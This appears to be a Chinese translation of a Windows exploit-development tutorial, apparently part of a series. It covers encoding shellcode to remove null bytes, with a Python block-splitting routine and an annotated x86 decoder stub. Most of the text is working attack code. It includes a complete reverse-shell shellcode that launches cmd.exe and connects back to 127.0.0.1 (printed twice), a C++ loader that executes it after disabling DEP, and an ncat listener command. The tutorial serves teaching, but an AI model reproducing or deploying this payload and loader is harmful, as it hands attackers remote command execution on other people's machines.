方法是将shellcode分为多个254字节的块。注意每个块必须存在一个 “missing byte”,因为一个字节可以具有255个非0值。我们可以对每个块进行逐个处理来为每个块选择missing byte。但是这样做可能效率不高,因为对于一段具有254*N个字节的shellcode来说,我们需要在shellcode(存在识别missing bytesdecoder)被处理之前或之后存储N个 “missing bytes”。最有效的做法是,为尽可能多个254字节的块使用相同的“missing bytes”。我们从shellcode的起始部分开始对块进行处理,直到处理完最后一个块。最后,我们会有<missing_byte, num_blocks>配对的列表:

[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...] 

我已决定将num_blocksX限制为一个单一字节,因此,num_blocksX 的值会在1到255之间。

此处是get_fixed_shellcode部分,该部分将shellcode分为多个块。

def get_fixed_shellcode(shellcode):     '''     Returns a version of shellcode without null bytes. This version divides     the shellcode into multiple blocks and should be used only if     get_fixed_shellcode_single_block() doesn't work with this shellcode.     '''       # The format of bytes_blocks is     #   [missing_byte1, number_of_blocks1,     #    missing_byte2, number_of_blocks2, ...]     # where missing_byteX is the value used to overwrite the null bytes in the     # shellcode, while number_of_blocksX is the number of 254-byte blocks where     # to use the corresponding missing_byteX.     bytes_blocks = []     shellcode_len = len(shellcode)     i = 0     while i < shellcode_len:         num_blocks = 0         missing_bytes = list(range(1, 256))           # Tries to find as many 254-byte contiguous blocks as possible which misses at         # least one non-null value. Note that a single 254-byte block always misses at         # least one non-null value.         while True:             if i >= shellcode_len or num_blocks == 255:                 bytes_blocks += [missing_bytes[0], num_blocks]                 break             bytes = set([ord(c) for c in shellcode[i:i+254]])             new_missing_bytes = [b for b in missing_bytes if b not in bytes]             if len(new_missing_bytes) != 0:         # new block added                 missing_bytes = new_missing_bytes                 num_blocks += 1                 i += 254             else:                 bytes += [missing_bytes[0], num_blocks]                 break <snip> 

就像之前,我们需要讨论在shellcode起始部分提前准备好的“decoder”。该decoder的代码比之前的更长,但是原理相同。

这里是代码:

code = ([     0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes                                                         # bytes:     bytes_blocks + [                                    #   ...                                                         # skip_bytes:     0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4                                                         # here:     0xC0,                                               #   (FF)C0 = INC EAX     0x5F,                                               #   POP EDI     0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>     0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>     0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]     0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here                                                         # loop1:     0xB0, 0xFE,                                         #   MOV AL, 0FEh     0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]     0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX     0x33, 0xF6,                                         #   XOR ESI, ESI     0xFC,                                               #   CLD                                                         # loop2:     0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]     0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]     0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI     0xAA,                                               #   STOSB     0x49,                                               #   DEC ECX     0x74, 0x07,                                         #   JE shellcode_begin     0x4A,                                               #   DEC EDX     0x75, 0xF2,                                         #   JNE loop2     0x43,                                               #   INC EBX     0x43,                                               #   INC EBX     0xEB, 0xE3                                          #   JMP loop1                                                         # shellcode_begin: ]) 

bytes_blocks是数组:

[missing_byte1, num_blocks1, missing_byte2, num_blocks2, ...] 

我们在之前已经讨论过,但是没有配对。

注意代码始于跳过bytes_blocksJMP SHORT指令。为了实现该操作,len(bytes_blocks)必须小于或等于0x7F。但是正如你所看到的,len(bytes_blocks) 也出现在另一条指令中:

0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)] 

这里要求len(bytes_blocks) 小于或等于0x7F – 5,因此这是决定性的条件。如果条件违规,则:

if len(bytes_blocks) > 0x7f - 5: # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes". return None 

进一步审计代码:

JMP SHORT skip_bytes bytes:   ... skip_bytes:   CALL $ + 4                                  ; PUSH "here"; JMP "here"-1 here:   (FF)C0 = INC EAX                            ; not important: just a NOP   POP EDI                                     ; EDI = absolute address of "here"   MOV ECX, <xor value 1 for shellcode len>   XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length   LEA EBX, [EDI + (bytes - here)]             ; EBX = absolute address of "bytes"   ADD EDI, shellcode_begin - here             ; EDI = absolute address of the shellcode loop1:   MOV AL, 0FEh                                ; AL = 254   MUL AL, BYTE PTR [EBX+1]                    ; AX = 254 * current num_blocksX = num bytes   MOVZX EDX, AX                               ; EDX = num bytes of the current chunk   XOR ESI, ESI                                ; ESI = 0   CLD                                         ; tells STOSB to go forwards loop2:   MOV AL, BYTE PTR [EDI]                      ; AL = current byte of shellcode   CMP AL, BYTE PTR [EBX]                      ; is AL the missing byte for the current chunk?   CMOVE EAX, ESI                              ; if it is, then EAX = 0   STOSB                                       ; replaces the current byte of the shellcode with AL   DEC ECX                                     ; ECX -= 1   JE shellcode_begin                          ; if ECX == 0, then we're done!   DEC EDX                                     ; EDX -= 1   JNE loop2                                   ; if EDX != 0, then we keep working on the current chunk   INC EBX                                     ; EBX += 1  (moves to next pair...   INC EBX                                     ; EBX += 1   ... missing_bytes, num_blocks)   JMP loop1                                   ; starts working on the next chunk shellcode_begin: 

测试脚本

这部分会简明易懂!如果没有任何参数,运行脚本将会显示如下:

Shellcode Extractor by Massimiliano Tomassoli (2015)  Usage:   sce.py <exe file> <map file> 

如果你还记得,我们也已经告诉过VS 2013linker生成一个映射文件。只调用具有exe文件及映射文件路径的脚本。此处是从反向shellcode中得到的信息:

Shellcode Extractor by Massimiliano Tomassoli (2015)  Extracting shellcode length from "mapfile"... shellcode length: 614 Extracting shellcode from "shellcode.exe" and analyzing relocations... Found 3 reference(s) to 3 string(s) in .rdata Strings:   ws2_32.dll   cmd.exe   127.0.0.1  Fixing the shellcode... final shellcode length: 715  char shellcode[] = "/xe8/xff/xff/xff/xff/xc0/x5f/xb9/xa8/x03/x01/x01/x81/xf1/x01/x01" "/x01/x01/x83/xc7/x1d/x33/xf6/xfc/x8a/x07/x3c/x05/x0f/x44/xc6/xaa" "/xe2/xf6/xe8/x05/x05/x05/x05/x5e/x8b/xfe/x81/xc6/x7b/x02/x05/x05" "/xb9/x03/x05/x05/x05/xfc/xad/x01/x3c/x07/xe2/xfa/x55/x8b/xec/x83" "/xe4/xf8/x81/xec/x24/x02/x05/x05/x53/x56/x57/xb9/x8d/x10/xb7/xf8" "/xe8/xa5/x01/x05/x05/x68/x87/x02/x05/x05/xff/xd0/xb9/x40/xd5/xdc" "/x2d/xe8/x94/x01/x05/x05/xb9/x6f/xf1/xd4/x9f/x8b/xf0/xe8/x88/x01" "/x05/x05/xb9/x82/xa1/x0d/xa5/x8b/xf8/xe8/x7c/x01/x05/x05/xb9/x70" "/xbe/x1c/x23/x89/x44/x24/x18/xe8/x6e/x01/x05/x05/xb9/xd1/xfe/x73" "/x1b/x89/x44/x24/x0c/xe8/x60/x01/x05/x05/xb9/xe2/xfa/x1b/x01/xe8" "/x56/x01/x05/x05/xb9/xc9/x53/x29/xdc/x89/x44/x24/x20/xe8/x48/x01" "/x05/x05/xb9/x6e/x85/x1c/x5c/x89/x44/x24/x1c/xe8/x3a/x01/x05/x05" "/xb9/xe0/x53/x31/x4b/x89/x44/x24/x24/xe8/x2c/x01/x05/x05/xb9/x98" "/x94/x8e/xca/x8b/xd8/xe8/x20/x01/x05/x05/x89/x44/x24/x10/x8d/x84" "/x24/xa0/x05/x05/x05/x50/x68/x02/x02/x05/x05/xff/xd6/x33/xc9/x85" "/xc0/x0f/x85/xd8/x05/x05/x05/x51/x51/x51/x6a/x06/x6a/x01/x6a/x02" "/x58/x50/xff/xd7/x8b/xf0/x33/xff/x83/xfe/xff/x0f/x84/xc0/x05/x05" "/x05/x8d/x44/x24/x14/x50/x57/x57/x68/x9a/x02/x05/x05/xff/x54/x24" "/x2c/x85/xc0/x0f/x85/xa8/x05/x05/x05/x6a/x02/x57/x57/x6a/x10/x8d" "/x44/x24/x58/x50/x8b/x44/x24/x28/xff/x70/x10/xff/x70/x18/xff/x54" "/x24/x40/x6a/x02/x58/x66/x89/x44/x24/x28/xb8/x05/x7b/x05/x05/x66" "/x89/x44/x24/x2a/x8d/x44/x24/x48/x50/xff/x54/x24/x24/x57/x57/x57" "/x57/x89/x44/x24/x3c/x8d/x44/x24/x38/x6a/x10/x50/x56/xff/x54/x24" "/x34/x85/xc0/x75/x5c/x6a/x44/x5f/x8b/xcf/x8d/x44/x24/x58/x33/xd2" "/x88/x10/x40/x49/x75/xfa/x8d/x44/x24/x38/x89/x7c/x24/x58/x50/x8d" "/x44/x24/x5c/xc7/x84/x24/x88/x05/x05/x05/x05/x01/x05/x05/x50/x52" "/x52/x52/x6a/x01/x52/x52/x68/x92/x02/x05/x05/x52/x89/xb4/x24/xc0" "/x05/x05/x05/x89/xb4/x24/xbc/x05/x05/x05/x89/xb4/x24/xb8/x05/x05" "/x05/xff/x54/x24/x34/x6a/xff/xff/x74/x24/x3c/xff/x54/x24/x18/x33" "/xff/x57/xff/xd3/x5f/x5e/x33/xc0/x5b/x8b/xe5/x5d/xc3/x33/xd2/xeb" "/x10/xc1/xca/x0d/x3c/x61/x0f/xbe/xc0/x7c/x03/x83/xe8/x20/x03/xd0" "/x41/x8a/x01/x84/xc0/x75/xea/x8b/xc2/xc3/x55/x8b/xec/x83/xec/x14" "/x53/x56/x57/x89/x4d/xf4/x64/xa1/x30/x05/x05/x05/x89/x45/xfc/x8b" "/x45/xfc/x8b/x40/x0c/x8b/x40/x14/x8b/xf8/x89/x45/xec/x8d/x47/xf8" "/x8b/x3f/x8b/x70/x18/x85/xf6/x74/x4f/x8b/x46/x3c/x8b/x5c/x30/x78" "/x85/xdb/x74/x44/x8b/x4c/x33/x0c/x03/xce/xe8/x9e/xff/xff/xff/x8b" "/x4c/x33/x20/x89/x45/xf8/x03/xce/x33/xc0/x89/x4d/xf0/x89/x45/xfc" "/x39/x44/x33/x18/x76/x22/x8b/x0c/x81/x03/xce/xe8/x7d/xff/xff/xff" "/x03/x45/xf8/x39/x45/xf4/x74/x1e/x8b/x45/xfc/x8b/x4d/xf0/x40/x89" "/x45/xfc/x3b/x44/x33/x18/x72/xde/x3b/x7d/xec/x75/xa0/x33/xc0/x5f" "/x5e/x5b/x8b/xe5/x5d/xc3/x8b/x4d/xfc/x8b/x44/x33/x24/x8d/x04/x48" "/x0f/xb7/x0c/x30/x8b/x44/x33/x1c/x8d/x04/x88/x8b/x04/x30/x03/xc6" "/xeb/xdd/x2f/x05/x05/x05/xf2/x05/x05/x05/x80/x01/x05/x05/x77/x73" "/x32/x5f/x33/x32/x2e/x64/x6c/x6c/x05/x63/x6d/x64/x2e/x65/x78/x65" "/x05/x31/x32/x37/x2e/x30/x2e/x30/x2e/x31/x05"; 

重点在于重定位信息,因为可以根据它来检查一切是否OK。例如,我们了解到反向shell使用3个字符串来实现,并且它们是从.rdata节中提取的。我们可以了解到原始shellcode为614个字节,同时也了解到已生成的shellcode(在处理了重定向信息以及null字节之后)为715字节。

现在需要运行已生成的shellcode。此处是完整的源码:

#include <cstring> #include <cassert>   // Important: Disable DEP! //  (Linker->Advanced->Data Execution Prevention = NO)   void main() {     char shellcode[] =         "/xe8/xff/xff/xff/xff/xc0/x5f/xb9/xa8/x03/x01/x01/x81/xf1/x01/x01"         "/x01/x01/x83/xc7/x1d/x33/xf6/xfc/x8a/x07/x3c/x05/x0f/x44/xc6/xaa"         "/xe2/xf6/xe8/x05/x05/x05/x05/x5e/x8b/xfe/x81/xc6/x7b/x02/x05/x05"         "/xb9/x03/x05/x05/x05/xfc/xad/x01/x3c/x07/xe2/xfa/x55/x8b/xec/x83"         "/xe4/xf8/x81/xec/x24/x02/x05/x05/x53/x56/x57/xb9/x8d/x10/xb7/xf8"         "/xe8/xa5/x01/x05/x05/x68/x87/x02/x05/x05/xff/xd0/xb9/x40/xd5/xdc"         "/x2d/xe8/x94/x01/x05/x05/xb9/x6f/xf1/xd4/x9f/x8b/xf0/xe8/x88/x01"         "/x05/x05/xb9/x82/xa1/x0d/xa5/x8b/xf8/xe8/x7c/x01/x05/x05/xb9/x70"         "/xbe/x1c/x23/x89/x44/x24/x18/xe8/x6e/x01/x05/x05/xb9/xd1/xfe/x73"         "/x1b/x89/x44/x24/x0c/xe8/x60/x01/x05/x05/xb9/xe2/xfa/x1b/x01/xe8"         "/x56/x01/x05/x05/xb9/xc9/x53/x29/xdc/x89/x44/x24/x20/xe8/x48/x01"         "/x05/x05/xb9/x6e/x85/x1c/x5c/x89/x44/x24/x1c/xe8/x3a/x01/x05/x05"         "/xb9/xe0/x53/x31/x4b/x89/x44/x24/x24/xe8/x2c/x01/x05/x05/xb9/x98"         "/x94/x8e/xca/x8b/xd8/xe8/x20/x01/x05/x05/x89/x44/x24/x10/x8d/x84"         "/x24/xa0/x05/x05/x05/x50/x68/x02/x02/x05/x05/xff/xd6/x33/xc9/x85"         "/xc0/x0f/x85/xd8/x05/x05/x05/x51/x51/x51/x6a/x06/x6a/x01/x6a/x02"         "/x58/x50/xff/xd7/x8b/xf0/x33/xff/x83/xfe/xff/x0f/x84/xc0/x05/x05"         "/x05/x8d/x44/x24/x14/x50/x57/x57/x68/x9a/x02/x05/x05/xff/x54/x24"         "/x2c/x85/xc0/x0f/x85/xa8/x05/x05/x05/x6a/x02/x57/x57/x6a/x10/x8d"         "/x44/x24/x58/x50/x8b/x44/x24/x28/xff/x70/x10/xff/x70/x18/xff/x54"         "/x24/x40/x6a/x02/x58/x66/x89/x44/x24/x28/xb8/x05/x7b/x05/x05/x66"         "/x89/x44/x24/x2a/x8d/x44/x24/x48/x50/xff/x54/x24/x24/x57/x57/x57"         "/x57/x89/x44/x24/x3c/x8d/x44/x24/x38/x6a/x10/x50/x56/xff/x54/x24"         "/x34/x85/xc0/x75/x5c/x6a/x44/x5f/x8b/xcf/x8d/x44/x24/x58/x33/xd2"         "/x88/x10/x40/x49/x75/xfa/x8d/x44/x24/x38/x89/x7c/x24/x58/x50/x8d"         "/x44/x24/x5c/xc7/x84/x24/x88/x05/x05/x05/x05/x01/x05/x05/x50/x52"         "/x52/x52/x6a/x01/x52/x52/x68/x92/x02/x05/x05/x52/x89/xb4/x24/xc0"         "/x05/x05/x05/x89/xb4/x24/xbc/x05/x05/x05/x89/xb4/x24/xb8/x05/x05"         "/x05/xff/x54/x24/x34/x6a/xff/xff/x74/x24/x3c/xff/x54/x24/x18/x33"         "/xff/x57/xff/xd3/x5f/x5e/x33/xc0/x5b/x8b/xe5/x5d/xc3/x33/xd2/xeb"         "/x10/xc1/xca/x0d/x3c/x61/x0f/xbe/xc0/x7c/x03/x83/xe8/x20/x03/xd0"         "/x41/x8a/x01/x84/xc0/x75/xea/x8b/xc2/xc3/x55/x8b/xec/x83/xec/x14"         "/x53/x56/x57/x89/x4d/xf4/x64/xa1/x30/x05/x05/x05/x89/x45/xfc/x8b"         "/x45/xfc/x8b/x40/x0c/x8b/x40/x14/x8b/xf8/x89/x45/xec/x8d/x47/xf8"         "/x8b/x3f/x8b/x70/x18/x85/xf6/x74/x4f/x8b/x46/x3c/x8b/x5c/x30/x78"         "/x85/xdb/x74/x44/x8b/x4c/x33/x0c/x03/xce/xe8/x9e/xff/xff/xff/x8b"         "/x4c/x33/x20/x89/x45/xf8/x03/xce/x33/xc0/x89/x4d/xf0/x89/x45/xfc"         "/x39/x44/x33/x18/x76/x22/x8b/x0c/x81/x03/xce/xe8/x7d/xff/xff/xff"         "/x03/x45/xf8/x39/x45/xf4/x74/x1e/x8b/x45/xfc/x8b/x4d/xf0/x40/x89"         "/x45/xfc/x3b/x44/x33/x18/x72/xde/x3b/x7d/xec/x75/xa0/x33/xc0/x5f"         "/x5e/x5b/x8b/xe5/x5d/xc3/x8b/x4d/xfc/x8b/x44/x33/x24/x8d/x04/x48"         "/x0f/xb7/x0c/x30/x8b/x44/x33/x1c/x8d/x04/x88/x8b/x04/x30/x03/xc6"         "/xeb/xdd/x2f/x05/x05/x05/xf2/x05/x05/x05/x80/x01/x05/x05/x77/x73"         "/x32/x5f/x33/x32/x2e/x64/x6c/x6c/x05/x63/x6d/x64/x2e/x65/x78/x65"         "/x05/x31/x32/x37/x2e/x30/x2e/x30/x2e/x31/x05";       static_assert(sizeof(shellcode) > 4, "Use 'char shellcode[] = ...' (not 'char *shellcode = ...')");       // We copy the shellcode to the heap so that it's in writeable memory and can modify itself.     char *ptr = new char[sizeof(shellcode)];     memcpy(ptr, shellcode, sizeof(shellcode));     ((void(*)())ptr)(); } 

此时需要关闭DEP(Data Execution Prevention)来让该段代码成功地被执行,通过Project→<solution name> Properties 然后在 Configuration Properties下, Linker and Advanced, 将 Data Execution Prevention(DEP) 设为 No (/NXCOMPAT:NO)。因为shellcode将会在堆中被执行,所以开启了DEP会导致shellcode无法被执行。

C++11(因此需要VS 2013 CTP)标准中介绍了static_assert ,使用如下语句来检查

char shellcode[] = "..." 

而不是

char *shellcode = "..." 

在第一个案例中,sizeof(shellcode)表示shellcode的有效长度,此时shellcode已经被复制到栈上了。在第二个案例中,sizeof(shellcode) 只是表示指针(i.e. 4)的大小,并且该指针指向在.rdata节中的shellcode

可以打开cmd shell来测试shellcode

ncat -lvp 123 

接着运行shellcode并观察它是否被成功执行。

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: